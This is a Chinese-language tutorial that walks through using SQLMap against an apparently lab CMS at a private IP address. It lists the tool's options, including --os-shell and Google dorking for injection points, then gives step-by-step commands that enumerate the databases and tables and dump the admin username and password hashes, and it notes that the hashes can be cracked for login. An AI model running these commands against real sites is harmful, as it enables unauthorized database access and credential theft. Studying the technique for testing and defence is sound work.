SQLMap获取cms 后台管理员账密
文章目录
前言
之前使用联合查询和报错注入获取了cms的后台管理员账密,这次使用SQLMap来获取
一、SQLMap是什么
SQLMap 是一款专注于sQLv 的工具,堪称神器。SQLmap 基于Python 语言编写的命令行工具,集成在KALI中。
二、使用步骤
1.sqlmap的更新与安装
1.kali 自带sqlmap安装
sudo apt-get update
sudo apt-get install sqlmap
2.源码包安装
git clone https://github.com/sqlmapproject/sqlmap.git
git fetch
git pull
2.参数说明
参数 | 说明 |
---|---|
-u | 检测注入点 |
- -dbs | 列出所有库名 |
- -current-user | 当前连接数据库用户的名字 |
- -current-db | 当前数据库的名字 |
-D “cms” | 指定目标数据库为cms |
- -tables | 列出数据库中的所有表名 |
-T “cms_users” | 指定目标表名为"cms_users" |
- -columns | 列出所有的字段名 |
-C “username,password” | 指定目标字段 |
- -dump | 列出字段内容 |
-r | 从文件中读取HTTP请求 |
- -os-shell | 特定情况下,可以直接获取目标系统shell |
- -level 3 | 设置sqlmap 检测等级3 |
- -cookie=“username=admin” | 携带Cookie信息进行注入 |
-g | 利用google搜索引擎自动搜索注入点 |
- -batch | 使用默认选项 |
- -random-agent | 使用随机User-Agent信息 |
-v 3 | 显示payload |
三、案例实现
使用此命令查询所有库名
┌──(kali💋kali)-[~]
└─$ sqlmap -u "http://10.4.7.151/cms/show.php?id=34" --dbs
使用此命令查询当前数据库的名字
kali💋kali)-[~]
└─$ sqlmap -u "http://10.4.7.151/cms/show.php?id=34" --current-db
使用此命令查询cms
数据库的所有表名
(kali💋kali)-[~]
└─$ sqlmap -u "http://10.4.7.151/cms/show.php?id=34" -D 'cms' --tables
使用此命令查询cms
数据库下cms_users
表中的所有字段
(kali💋kali)-[~]
└─$ sqlmap -u "http://10.4.7.151/cms/show.php?id=34" -D 'cms' -T 'cms_users' --columns
使用此命令查询cms
数据库下cms_users
表中的username,password
的内容
(kali💋kali)-[~]
└─$ sqlmap -u "http://10.4.7.151/cms/show.php?id=34" -D 'cms' -T 'cms_users' -C 'username,password' --dump
这里使用的加密方式是MD5加密,也可以使用kali中有自带的密码本破解
输入刚刚获取的账密登录验证
成功